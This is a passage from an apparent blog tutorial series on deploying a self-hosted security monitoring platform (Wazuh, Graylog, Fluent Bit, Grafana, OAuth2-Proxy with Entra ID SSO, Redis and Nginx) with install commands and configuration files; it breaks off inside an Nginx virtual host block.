point.</strong> Instead of managing users and passwords separately, OAuth2-Proxy delegates all authentication to IdP. The user logs in once and accesses all three systems. Local credentials are eliminated from the lifecycle.</p><h3>What’s coming in the next articles</h3><p>This series covers the complete implementation, component by component:</p><ol><li><strong>Introduction and architecture</strong> ← you are here</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#2776">Wazuh</a> — SIEM/XDR</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#8987">MongoDB</a> — Graylog’s DB</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#a640">Graylog</a> — Log management, data input, alerts</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#f229">Fluent Bit</a> — Log shipper</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#014b">Grafana</a> — Real-Time Operational Dashboards</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#4874">OAuth2-Proxy</a> — Single Sign-On with IdP (Identity Provider)</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#3b56">Redis</a> — Session Persistence and Storage</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#b390">Nginx</a> — Reverse Proxy with TLS and Header-Based Authentication</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#fcdf">Troubleshooting Guide</a></li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#938b">Authentication </a>— Four steps: SSO and intregation Graylog with Wazuh</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#e3ed">Graylog Ingest</a> — Configuring Data Ingest from Fluent Bit</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#6a74">Graylog MCP + Claude</a> — Querying logs in natural language with AI</li><li><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#48e5">Final architecture, evidences, and conclusions</a></li></ol><p>Each article includes the exact commands used in production.</p><p>Recommendation: Create a working directory. In some sections, we jump to different directories cd; after each step, return to the directory.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*469jrtAPhs6EMetM.png"></figure><h3>Wazuh: SIEM/XDR</h3><p><strong><em>Part 2</em></strong></p><p>This article covers the foundation of the entire stack: the server where the platform lives, and the installation and configuration of Wazuh — the SIEM/XDR engine that detects and correlates security events in real time.</p><p><strong>The server platform<br></strong>Before installing any component, it’s worth explaining the storage decision. We use <strong>separate LVM volumes</strong> for the operating system, application data, and logs:</p><p>Volume Size Path Operating system 60 GB / Data 150 GB /data Logs 20 GB /log Swap 4 GB — estimate sizes based on own infrastructure.</p><p><strong>Why this separation?</strong> If logs grow out of control — and they will — they don’t affect the operating system or application data. Scaling log storage is as simple as expanding the /log volume without touching anything else. The same logic applies to application data in /data.</p><p><strong>Wazuh: the detection engine<br></strong>Wazuh is an open source SIEM (Security Information and Event Management) and XDR (Extended Detection and Response) platform. In practical terms, it continuously monitors system events, correlates alerts, detects file integrity issues, access anomalies, and much more.</p><p>In this implementation, Wazuh serves two roles:</p><ol><li><strong>Detection</strong> — analyzes operating system and service events.</li><li><strong>Export</strong> — generates alerts in JSON format that Fluent Bit forwards to Graylog.</li></ol><h3>Installation</h3><p>Wazuh’s installation is notable for its simplicity: a single script handles the entire stack (Wazuh Manager, Indexer, and Dashboard).</p><pre>curl -sO https://packages.wazuh.com/4.14/wazuh-install.sh &amp;&amp; bash ./wazuh-install.sh -a</pre><blockquote><strong><em>Info: </em></strong>Despite the compatibility information, it works without problems with Ubuntu 26.04.</blockquote><blockquote>“The recommended systems are: Red Hat Enterprise Linux 7, 8, 9; CentOS 7, 8; Amazon Linux 2; Amazon Linux 2023; Ubuntu 16.04, 18.04, 20.04, 22.04; Rocky Linux 9.4”</blockquote><blockquote><strong><em>Test environments:</em></strong><em> If the server doesn’t meet the minimum hardware requirements (4 GB RAM, 2 CPU cores), add the </em><em>-i argument to skip the validation.</em></blockquote><h3>Configuration</h3><p>The Wazuh installer places its data in default paths /var/lib/wazuh-indexer, /var/ossec/logs. We need to mount bind them to our LVM volumes while keeping the original paths functional.</p><pre># Stop services<br><br>systemctl stop wazuh-indexer wazuh-dashboard wazuh-manager filebeat</pre><p>Filebeat is included in the Wazuh installation but we’ll replace it with Fluent Bit, which is lighter and more flexible for forwarding events to Graylog.</p><pre># Disable Filebeat<br><br>systemctl disable filebeat</pre><pre># Create directory structure<br><br>mkdir -p /data/wazuh-indexer/lib /log/wazuh-indexer /data/wazuh/ossec/logs</pre><pre># Assign permissions to the service user and files<br><br>chown wazuh-indexer:wazuh-indexer /data/wazuh-indexer/lib /log/wazuh-indexer<br>chown wazuh:wazuh /data/wazuh/ossec/logs<br>chmod 770 /data/wazuh/ossec/logs </pre><pre># Move existing content<br><br>mv /var/lib/wazuh-indexer/* /data/wazuh-indexer/lib/<br>mv /var/ossec/logs/* /data/wazuh/ossec/logs/</pre><p><strong>Mount with bind — preserving original paths</strong></p><p>The key is using bind mounts: services continue using their default paths, but the actual storage is on the LVM volumes. This avoids modifying Wazuh’s internal configuration.</p><blockquote>Evaluate:<br>With “nofails” the server will start even if the mounts fail, but the services will fail. <br>Omitting “nofails” will start in emergency mode.</blockquote><pre>echo "/data/wazuh/ossec/logs /var/ossec/logs none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/data/wazuh-indexer/lib /var/lib/wazuh-indexer none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/log/wazuh-indexer /var/log/wazuh-indexer none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p><strong>Compatibility adjustment for Graylog</strong></p><p>Wazuh Indexer uses OpenSearch with an option that, by default, forces another version for Filebeat compatibility.</p><pre># /etc/wazuh-indexer/opensearch.yml - Comment out<br><br>#compatibility.override_main_response_version: true</pre><blockquote><strong><em>About the Dashboard warning:</em></strong> When connecting Graylog, the Wazuh Dashboard may display a warning about <em>wazuh-alerts-*</em> index patterns. This is a cosmetic warning that does not affect functionality — it can be safely ignored.</blockquote><blockquote><strong><em>Expected scenario:</em></strong> Filebeat cannot send data to the indexer, and alerts will not appear in the Wazuh dashboard.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/676/1*dpEcqSAQaH46kFkbqa7VoQ.jpeg"><figcaption>warning</figcaption></figure><h3>Adjusting the Dashboard for Nginx</h3><p>The Wazuh Dashboard will listen on 127.0.0.1:8080 instead of the default port, since Nginx will act as a reverse proxy with TLS on port 443.</p><pre># /etc/wazuh-dashboard/opensearch_dashboards.yml<br><br>server.host: 127.0.0.1<br>server.port: 8080</pre><p><strong>Credentials and backup<br></strong>After installation, Wazuh generates a wazuh-install-files.tar file containing certificates, the root CA, and passwords. It's critical to extract and back it up immediately.</p><pre>tar -xvf wazuh-install-files.tar</pre><p>The wazuh-passwords.txt file inside contains all automatically generated passwords. Protecting it is mandatory.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*469jrtAPhs6EMetM.png"></figure><h3>MongoDB: Graylog’s DB</h3><p><strong><em>Part 3</em></strong></p><p>MongoDB is the database Graylog uses to store its internal configuration: streams, alerts, dashboards, users, and metadata. It does not store the logs themselves — that’s handled by OpenSearch/ElasticSearch — but it’s an essential component for Graylog to function.</p><p><strong>An important warning before installing</strong></p><p>MongoDB version 8.0 has <strong>kernel incompatibilities with Ubuntu 26.04</strong>. The stable, tested version for this implementation is <strong>7.0</strong>. This is one of those cases where the latest version is not the best choice.</p><h3>Installation</h3><p>Add the official MongoDB 7.0 repository and install.</p><pre>curl -fsSL https://pgp.mongodb.com/server-7.0.asc | gpg -o /usr/share/keyrings/mongodb-server-7.0.gpg --dearmor<br>echo "deb [signed-by=/usr/share/keyrings/mongodb-server-7.0.gpg] https://repo.mongodb.org/apt/ubuntu jammy/mongodb-org/7.0 multiverse" | tee /etc/apt/sources.list.d/mongodb-org-7.0.list<br>apt update<br>apt install mongodb-org -y</pre><h3>Configuration</h3><p>We apply the same pattern as with Wazuh: move data to the /data volume and logs to the /log volume, using bind mounts to keep the original paths intact.</p><pre># Create directory structure<br><br>mkdir -p /data/mongodb/lib /log/mongodb</pre><pre># Assign permissions to the service user<br><br>chown mongodb:mongodb /data/mongodb/lib /log/mongodb</pre><pre># Bind mount<br><br>echo "/data/mongodb/lib /var/lib/mongodb none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/log/mongodb /var/log/mongodb none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p><strong>Why does this pattern repeat?</strong></p><p>We apply the same storage strategy to every component in the stack. The reason is simple: in a production environment, data must survive an OS reinstallation. If the OS lives on / (60 GB) and data on /data (150 GB), I can reinstall Ubuntu without losing any application data.</p><p>The /log volume (20 GB) is independent because logs have a different lifecycle — they rotate, compress, and get deleted — and we don't want their growth to affect either the OS or application data.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*MbvwpOS6jWqHHZiX.png"></figure><h3>Graylog: Centralized Log Management with TLS Integration to Wazuh Indexer</h3><p><strong><em>Part 4</em></strong></p><p>Graylog is the heart of log management in this platform. It receives security events from Fluent Bit, indexes them in OpenSearch (through Wazuh Indexer), enables real-time searches, and exposes an API that we later connect to Claude via MCP.</p><h3>Installation</h3><p>Graylog requires Java as a dependency. We install Java 17 and then the Graylog 7.1 server.</p><pre>apt install openjdk-17-jre-headless -y<br>wget https://packages.graylog2.org/repo/packages/graylog-7.1-repository_latest.deb<br>dpkg -i graylog-7.1-repository_latest.deb<br>apt-get update<br>apt install graylog-server -y</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /data/graylog/lib/journal /data/graylog/jks /var/lib/graylog-server/journal /log/graylog</pre><pre># Assign permissions to the service user<br><br>chown -R graylog:graylog /data/graylog/lib /var/lib/graylog-server/journal /log/graylog</pre><pre># Bind mount<br><br>echo "/data/graylog/lib/journal /var/lib/graylog-server/journal none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/log/graylog /var/log/graylog-server none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p><strong>Credential configuration</strong></p><p>Graylog requires two key values in its main configuration file.</p><pre># password_secret - internal encryption key (64 characters)<br><br>cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 64 | head -n 1</pre><pre># root_password_sha2 - SHA256 hash of the administrator password<br><br>echo -n '&lt;password&gt;' | shasum -a 256 | cut -d' ' -f1</pre><pre># /etc/graylog/server/server.conf<br><br>password_secret = &lt;password_secret&gt;<br>root_password_sha2 = &lt;root_password&gt;</pre><p><strong>Integration with Wazuh Indexer<br></strong>This is one of the most important steps and the one most frequently omitted in generic guides. Graylog needs to connect to Wazuh Indexer (OpenSearch) over HTTPS, which requires it to trust Wazuh’s CA certificate.</p><p>The solution is to incorporate Wazuh’s CA into a <strong>Java Key Store (JKS)</strong> that Graylog can use.</p><pre># Copy the base Java keystore<br><br>cp /usr/share/graylog-server/jvm/lib/security/cacerts /data/graylog/jks/graylog.jks<br>cd /data/graylog/jks<br><br># Import the Wazuh CA certificate<br># When keytool asks "Trust this certificate? [no]:", answer: y<br># Set a custom or random password<br><br>keytool -importcert -keystore graylog.jks -storepass &lt;password&gt; -alias wazuh-ca -file /etc/wazuh-indexer/certs/root-ca.pem</pre><p>Then configure Graylog to use this keystore at startup.</p><pre># /etc/default/graylog-server - Enter the password defined in the previous step<br><br>GRAYLOG_SERVER_JAVA_OPTS="-Djavax.net.ssl.trustStore=/data/graylog/jks/graylog.jks -Djavax.net.ssl.trustStorePassword=&lt;password&gt;"</pre><pre># Assign permissions to the service user<br><br>chown -R graylog:graylog /data/graylog/jks</pre><p><strong>Why not just disable TLS verification?</strong></p><p>It’s a common temptation to use ssl_verify=false to skip this entire process. The problem is that in production this eliminates a real security layer: any server could present itself as Wazuh Indexer and Graylog would accept it without question. The JKS procedure takes ten extra minutes and guarantees secure communication between components.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*YX5kBfyd9o1QNtX5.png"></figure><h3>Fluent Bit: The Bridge Between Wazuh and Graylog</h3><p><strong><em>Part 5</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*whGladAjwDiDE2Ic5UvWlA.jpeg"></figure><p>Fluent Bit is the component that connects Wazuh with Graylog. Its function is simple but critical: read the JSON alerts file that Wazuh generates in real time and forward each event to Graylog over TCP. It’s lightweight, efficient, and consumes minimal resources even under high event load.</p><p><strong>Why Fluent Bit instead of Filebeat?</strong></p><p>Wazuh installs Filebeat by default to export data to ElasticSearch. Filebeat can be configured to send to Graylog (at the same time, Graylog’s data source is Wazuh), but Fluent Bit is significantly lighter, has better support for complex pipelines, and consumes less memory.</p><p>The decision is clear: we disable Filebeat (covered in the Wazuh article) and install Fluent Bit.</p><h3>Installation</h3><p>Ubuntu 26.04 (Resolute Raccoon) doesn’t yet have official Fluent Bit packages. The solution is to use the <strong>Noble</strong> (Ubuntu 24.04) packages, which are compatible.</p><pre>sh -c 'curl https://packages.fluentbit.io/fluentbit.key | gpg --dearmor &gt; /usr/share/keyrings/fluentbit-keyring.gpg'<br>echo "deb [signed-by=/usr/share/keyrings/fluentbit-keyring.gpg] https://packages.fluentbit.io/ubuntu/noble noble main" | tee /etc/apt/sources.list.d/fluent-bit.list<br>apt update<br>apt install fluent-bit -y</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /log/fluent-bit /var/log/fluent-bit</pre><pre># Bind mount<br><br>echo "/log/fluent-bit /var/log/fluent-bit none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p><strong>The main configuration file</strong></p><p>This is the core of Fluent Bit. It defines three sections: the global service, the data input (INPUT), and the output (OUTPUT).</p><blockquote><strong><em>Pay attention when copying:</em></strong><em> </em>The Fluent Bit configuration file is sensitive to indentation. Incorrect indentation will prevent the service from starting<em>.</em></blockquote><pre># /etc/fluent-bit/fluent-bit.conf<br><br>[SERVICE]<br>  flush 5<br>  daemon Off<br>  log_level info<br>  log_file /log/fluent-bit/td-agent-bit.log<br>  parsers_file parsers.conf<br>  plugins_file plugins.conf<br>  http_server Off<br>  storage.metrics on<br>  storage.path /tmp/storage<br>  storage.sync normal<br>  storage.checksum off<br>  storage.backlog.mem_limit 5M<br>[INPUT]<br>  name tail<br>  path /var/ossec/logs/alerts/alerts.json<br>  tag wazuh<br>  parser json<br>  Buffer_Max_Size 5MB<br>  Buffer_Chunk_Size 400k<br>  storage.type filesystem<br>  Mem_Buf_Limit 512MB<br>[OUTPUT]<br>  Name tcp<br>  Host localhost<br>  Port 5555<br>  net.keepalive off<br>  Match wazuh<br>  Format json_lines<br>  json_date_key true</pre><p><strong>How the pipeline works</strong></p><ol><li><strong>INPUT </strong><strong>tail</strong> — Reads the /var/ossec/logs/alerts/alerts.json file continuously, similar to tail -f. Every time Wazuh writes a new alert, Fluent Bit detects it.</li><li><strong>Tag </strong><strong>wazuh</strong> — Labels each event so the OUTPUT knows what to process.</li><li><strong>OUTPUT </strong><strong>tcp</strong> — Sends each event to port 5555 on localhost in JSON format, where Graylog will listen with a Raw HTTP input.</li></ol><p>The on-disk buffer storage.type filesystem ensures no events are lost if Graylog is momentarily unreachable. Events accumulate and are resent once the connection is re-established.</p><blockquote><em>Optional: </em>REST API — Monitor Fluent Bit data pipelines.<br><em>https://docs.fluentbit.io/manual/administration/monitoring</em></blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*cbEm4ozA1npayvjy.png"></figure><h3>Grafana: Real-Time Operational Dashboards</h3><p><strong><em>Part 6</em></strong></p><p>Grafana is the visualization layer of the platform. It connects to Wazuh as a datasource and allows building operational dashboards that show in real time the state of the infrastructure: Wazuh alerts, log volume, access patterns, and any metric Graylog or Wazuh can provide.</p><p>In terms of base installation and configuration, Grafana is the simplest component in the stack. The complexity comes later when we integrate SSO authentication.</p><h3>Installation</h3><pre>wget -O /etc/apt/keyrings/grafana.asc https://apt.grafana.com/gpg-full.key<br>echo "deb [signed-by=/etc/apt/keyrings/grafana.asc] https://apt.grafana.com stable main" | tee -a /etc/apt/sources.list.d/grafana.list<br>apt update<br>apt install grafana -y</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /data/grafana/lib /log/grafana</pre><pre># Assign permissions to the service user<br><br>chown grafana:grafana /data/grafana/lib /log/grafana</pre><pre># Bind mount<br><br>echo "/data/grafana/lib /var/lib/grafana none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/log/grafana /var/log/grafana none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p>The specific security dashboards — visualizing Wazuh alerts, Graylog logs, and service metrics — depend on the datasources we’ll configure once the entire platform is operational.</p><p><strong>A note on the visualization architecture:</strong></p><p>In many similar implementations, Wazuh already includes its own dashboard based on OpenSearch Dashboards (Kibana). So why add Grafana?</p><p>The reason is <strong>datasource flexibility</strong>. The Wazuh Dashboard can only visualize data from Wazuh Indexer. Grafana can simultaneously connect to Wazuh, Prometheus, InfluxDB, SQL databases, and dozens of other sources. A single dashboard can show Wazuh alerts alongside infrastructure metrics, application logs, and any other data source — all in real time, with its own alerting system.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*MNHDU6UurKLbz20v.png"></figure><h3>OAuth2-Proxy: Single Sign-On with IdP</h3><p><strong><em>Part 7</em></strong></p><p>OAuth2-Proxy is the component that eliminates the need to manage users and passwords in Wazuh, Graylog, and Grafana separately. Instead, it delegates all authentication to IdP. The user logs in once with their corporate account and accesses all three systems without entering credentials again.</p><p>This article covers the installation of OAuth2-Proxy and its base configuration. The integration with each application is completed in the <a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37#938b">Authentication article</a>.</p><p><strong>How the flow works:</strong></p><p>When a user accesses <a href="https://wazuh.domain.com/">https://site.domain.com</a></p><ol><li>Nginx receives the request and asks OAuth2-Proxy if the user is authenticated auth_request /oauth2/auth</li><li>If there’s no active session, OAuth2-Proxy redirects the user to IdP portal.</li><li>The user authenticates with their corporate account.</li><li>IdP returns an ID Token to OAuth2-Proxy.</li><li>OAuth2-Proxy validates the token and creates a session stored in Redis.</li><li>Nginx propagates the user’s identity in an HTTP header.</li><li>Each application receives the header and assigns permissions accordingly.</li></ol><blockquote><strong><em>OAuth2 Proxy uses several layers to confirm a token’s validity</em></strong></blockquote><blockquote><em>Signature Verification:</em> The proxy checks that the token’s cryptographic signature was created by the trusted Identity Provider. It typically retrieves public keys automatically from the IdP JWKS (JSON Web Key Set) endpoint, which is discovered via the OpenID Connect well-known configuration URL.</blockquote><blockquote><em>Claim Validation</em>: Once the signature is verified, it inspects specific fields (claims) within the token:</blockquote><blockquote><em>iss (Issuer): </em>Must match the configured provider URL.</blockquote><blockquote><em>aud (Audience)</em>: Must contain the <em>client_id</em> of the OAuth2 Proxy instance to ensure the token was intended for this specific application.</blockquote><blockquote><em>exp (Expiration)</em>: Ensures the token has not expired.</blockquote><p>The result: a single sign-on for the entire platform, with persistent sessions stored in Redis.</p><h3>Installation</h3><pre>wget https://github.com/oauth2-proxy/oauth2-proxy/releases/download/v7.15.2/oauth2-proxy-v7.15.2.linux-amd64.tar.gz<br>tar -xzvf oauth2-proxy-v7.15.2.linux-amd64.tar.gz<br>chown root:root oauth2-proxy-v7.15.2.linux-amd64/oauth2-proxy<br>mv oauth2-proxy-v7.15.2.linux-amd64/oauth2-proxy /usr/sbin/</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /etc/oauth2-proxy /log/oauth2-proxy</pre><pre># Create service user<br><br>useradd -d /dev/null oauth2-proxy -s /usr/sbin/nologin</pre><pre># Create files<br><br>touch /etc/systemd/system/oauth2-proxy.service<br>touch /etc/oauth2-proxy/service.cfg</pre><pre># Assign permissions to the service user<br><br>chown oauth2-proxy:oauth2-proxy /log/oauth2-proxy</pre><pre># Generate the cookie secret (32 random characters)<br><br>cat /dev/urandom | tr -dc "a-zA-Z0-9" | fold -w 32 | head -n 1</pre><p><strong>Configuration file:</strong></p><blockquote>Case with IdP Microsoft Entra ID.</blockquote><blockquote>Enable debugs on errors.</blockquote><pre># /etc/oauth2-proxy/service.cfg<br><br>client_id = "&lt;app_id&gt;"<br>client_secret = "&lt;app_secret&gt;"<br>oidc_issuer_url = "https://login.microsoftonline.com/&lt;tenant_id&gt;/v2.0"<br>cookie_secret = "&lt;cookie_secret&gt;"<br>cookie_domains = "&lt;domain.com&gt;"<br>email_domains = "&lt;domain.com&gt;"<br>whitelist_domains = "*.&lt;domain.com&gt;"<br>cookie_expire = "24h"<br>cookie_httponly = true<br>cookie_refresh = "50m"<br>cookie_secure = true<br>logging_filename = "/log/oauth2-proxy/oauth2.log"<br>logging_max_size = 100<br>logging_max_age = 5<br>provider = "oidc"<br>provider_display_name = "OIDC"<br>redis_connection_url = "redis://127.0.0.1:6379"<br>scope = "openid offline_access"<br>session_store_type = "redis"<br>set_xauthrequest = true<br>silence_ping_logging = true<br>skip_provider_button = true<br>upstreams = [ "file:///dev/null" ]<br>#show_debug_on_error = true</pre><blockquote>More details: <a href="https://oauth2-proxy.github.io/oauth2-proxy/configuration/overview"><em>https://oauth2-proxy.github.io/oauth2-proxy/configuration/overview</em></a></blockquote><p><strong>Registering in Microsoft Entra ID</strong></p><blockquote><em>⚠</em><strong><em> Important</em></strong><em>: </em>The Authorization Code Flow is the primary method to authenticate users, an industry-standard. Both tokens — Access and ID — are not enabled for implicit or hybrid flows.</blockquote><blockquote>The variety of flows often leads to confusion. With Auth Code Flow and <em>openid</em> scope, we will always obtain an Identification Token👍</blockquote><p>For OAuth2-Proxy to work, you need to register an application in the Azure portal:</p><ol><li><strong>Azure Portal</strong> → Entra ID → App registrations → New registration</li><li>Application name, account type, and redirect URI: <a href="https://domain.com/oauth2/callback">https://system.&lt;domain.com&gt;/oauth2/callback</a></li><li>Obtain the <strong>Application Client ID</strong> and <strong>Tenant ID</strong>.</li><li>Create a <strong>Client Secret</strong> under “Certificates &amp; Secrets”</li><li>In “API permissions”, add openid and offline_access</li></ol><p>These values are used in client_id, client_secret, and oidc_issuer_url in the configuration file.</p><p><strong>Create service</strong></p><pre># /etc/systemd/system/oauth2-proxy.service<br><br>[Unit]<br>Description=OAuth2 Proxy Daemon<br>After=network.target<br>[Service]<br>User=oauth2-proxy<br>Group=oauth2-proxy<br>Type=simple<br>ExecStart=/usr/sbin/oauth2-proxy --config=/etc/oauth2-proxy/service.cfg<br>Restart=always<br>RestartSec=10<br>ProtectSystem=full<br>NoNewPrivileges=true<br>[Install]<br>WantedBy=multi-user.target</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*XMImQw4ixJ6WN3lV.png"></figure><h3>Redis: Session Persistence and Storage</h3><p><strong><em>Part 8</em></strong></p><p>Redis solves a real problem: OAuth2-Proxy session cookies can grow large (cookie bloat) and exceed size limits. Storing sessions in Redis instead of in the cookie keeps the size controlled and allows sessions to survive proxy restarts.</p><h3>Installation</h3><pre>apt install redis-server -y</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /data/redis/lib /log/redis</pre><pre># Assign permissions to the service user<br><br>chown redis:redis /data/redis/lib /log/redis</pre><pre># Bind mount<br><br>echo "/data/redis/lib /var/lib/redis none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>echo "/log/redis /var/log/redis none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*469jrtAPhs6EMetM.png"></figure><h3>Nginx: Reverse Proxy with TLS and Header-Based Authentication</h3><p><strong><em>Part 9</em></strong></p><p>Nginx is the entry point to the entire platform. It acts as a reverse proxy with TLS, routes traffic to Wazuh, Graylog, MCP, and Grafana, and coordinates with OAuth2-Proxy (except with MCP) to validate user identity on every request.</p><h3>Installation</h3><pre>apt install nginx -y</pre><h3>Configuration</h3><pre># Create directory structure<br><br>mkdir -p /log/nginx /etc/nginx/TLS</pre><pre># Create files<br><br>touch /etc/nginx/sites-available/{wazuh,graylog,graylog-mcp,grafana}<br>touch /etc/nginx/snippets/{security-headers.conf,oauth2-proxy.conf}<br>touch /etc/nginx/TLS/{certificate.crt,private.key}</pre><pre># Delete default host<br><br>rm /etc/nginx/sites-enabled/default</pre><pre># Bind mount<br><br>echo "/log/nginx /var/log/nginx none defaults,bind,nofail 0 0" &gt;&gt; /etc/fstab<br>systemctl daemon-reload<br>mount -a</pre><p><strong>Main configuration: nginx.conf</strong></p><p>The <strong>most notable </strong>aspect of this configuration is the map block: it extracts the username from the email returned by OIDC, taking everything before the @. This allows receive the username instead of the full email address.</p><blockquote>To avoid excessive logging, the access log is set to off.</blockquote><pre># /etc/nginx/nginx.conf<br><br>user www-data;<br>worker_processes auto;<br>worker_cpu_affinity auto;<br>pid /run/nginx.pid;<br>include /etc/nginx/modules-enabled/*.conf;<br>                                     <br>events {<br><br>  worker_connections 1024;<br><br>}<br><br>http {<br><br>  map $upstream_http_x_auth_request_email $http_x_auth_user {<br>    "~^(?&lt;user&gt;[^@]+)@" $user;<br>  }<br><br>  include mime.types;<br>  default_type application/octet-stream;<br>  sendfile on;<br>  tcp_nopush on;<br>  tcp_nodelay on;<br>  keepalive_timeout 65;<br>  keepalive_requests 1000;<br>  types_hash_max_size 2048;<br>  server_tokens off;<br>  gzip on;<br>  gzip_vary on;<br>  gzip_min_length 256;<br>  gzip_proxied any;<br>  gzip_comp_level 6;<br>  gzip_buffers 16 8k;<br>  gzip_http_version 1.1;<br>  gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;<br>  ssl_protocols TLSv1.2 TLSv1.3;<br>  ssl_prefer_server_ciphers on;<br>  ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH:!aNULL:!MD5:!3DES:!CBC:!SHA1';<br>  ssl_session_cache shared:SSL:10m;<br>  ssl_session_timeout 15m;<br>  access_log /var/log/nginx/access.log combined buffer=512k flush=1m;<br>  error_log /var/log/nginx/error.log;<br>  include /etc/nginx/conf.d/*.conf;<br>  include /etc/nginx/sites-enabled/*;<br><br>}</pre><p><strong>Security Headers snippet</strong></p><p>Best practices that strengthen your website’s security against common attacks.</p><pre># /etc/nginx/snippets/security-headers.conf<br><br>add_header Strict-Transport-Security "max-age=31536000; includeSubDomains";<br>add_header X-Frame-Options "SAMEORIGIN";<br>add_header X-XSS-Protection "1; mode=block";<br>add_header X-Content-Type-Options nosniff;<br>add_header X-Download-Options "noopen";<br>add_header Permissions-Policy 'geolocation=(), microphone=(), camera=()';<br>add_header Referrer-Policy 'no-referrer';<br>add_header Content-Security-Policy 'upgrade-insecure-requests';</pre><p><strong>OAuth2-Proxy snippet</strong></p><p>This snippet is included in every virtual host that requires authentication. It defines two locations: one for the OAuth2 flow and one internal for validating sessions.</p><pre># /etc/nginx/snippets/oauth2-proxy.conf<br><br>location /oauth2/ {<br>  proxy_pass http://localhost:4180;<br>  proxy_set_header Host $host;<br>  proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>  proxy_set_header Content-Length "";<br>  proxy_pass_request_body off;<br>  access_log off;<br>}<br><br>location = /oauth2/auth {<br>  internal;<br>  proxy_pass http://localhost:4180;<br>  proxy_set_header Host $host;<br>  proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;<br>  proxy_set_header Content-Length "";<br>  proxy_pass_request_body off;<br>}</pre><blockquote>The <em>Content-Length: ""</em> headers and <em>proxy_pass_request_body off</em> are critical. Without them, authentication requests to internal APIs fail. This configuration has been validated in production.</blockquote><p><strong>Virtual hosts: one per application</strong></p><p>Each application has its own configuration file. The pattern is consistent:</p><ul><li>Redirect HTTP to HTTPS (301).</li><li>TLS with Wildcard certificate.</li><li>Include security headers and OAuth2-Proxy snippet.</li><li>Proxy pass to each application’s local port.</li></ul><p><strong>Wazuh Host</strong></p><blockquote><em>⚠</em><strong><em> </em></strong>Firstly, proxy authentication in Wazuh does not require creating internal users.</blockquote><blockquote><em>⚠ </em>This configuration is intended for administration; therefore, it has the <em>"admin"</em> backend role hardcoded.</blockquote><blockquote><em>proxy_set_header x-proxy-roles "admin"</em></blockquote><blockquote>You can associate Security Groups or Nginx mappings with custom backend roles. See the <strong><em>Custom Backend Role</em>s </strong>references later in the authentication section.</blockquote><pre># /etc/nginx/sites-available/wazuh<br><br>server {<br>  listen 80;<br>  server_name wazuh.&lt;domain.com&gt;;<br>  access_log off;<br>  log_not_found off;<br>  return 301 https://wazuh.&lt;domain.com&gt;$request_uri;<br>}<br><br>server {<br>  listen 443 ssl;<br>  server_name wazuh.&lt;domain.com&gt;;<br>  ssl_certificate 